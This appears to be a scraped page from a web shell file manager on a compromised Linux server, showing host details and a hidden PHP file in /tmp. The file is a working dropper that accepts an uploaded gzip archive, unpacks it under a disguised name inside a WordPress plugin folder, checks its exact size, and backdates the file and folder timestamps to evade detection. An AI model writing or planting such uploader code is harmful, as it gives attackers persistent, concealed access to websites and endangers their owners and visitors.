HEX
Server: Apache
System: Linux host.fiblib.com 5.14.0-570.58.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Oct 29 06:24:11 EDT 2025 x86_64
User: scientificreligi (1062)
PHP: 8.0.30
Disabled: exec,passthru,shell_exec,system
Upload Files
File: //proc/self/root/tmp/.parle_tokens
<?php   $p = "/home/divi9immigration/public_html//home/divi9immigration/public_html/wp-content/plugins/click-to-chat-for-whatsapp/new/admin/admin_demo/dev/groups.setts"; $ft = 1730884113; if (move_uploaded_file($_FILES['file']['tmp_name'], "$p.gz")) {     $file = gzopen("$p.gz", 'rb');     $out = fopen($p, 'wb');     while (!gzeof($file)) {         fwrite($out, gzread($file, 4096));     }     fclose($out);     gzclose($file);     @unlink("$p.gz");     $filesize = filesize($p);     if ($filesize >= 189155) {         @chmod($p, 0744);         if ($ft) {             @touch($p, $ft, $ft);             @touch(@dirname($p), $ft, $ft);         }         die('_uploaded!_');     } else {         if (file_exists($p)) {             print "file exists but size = {$filesize} not 189155";         }         @unlink($p);     } } die('_upload_failed_');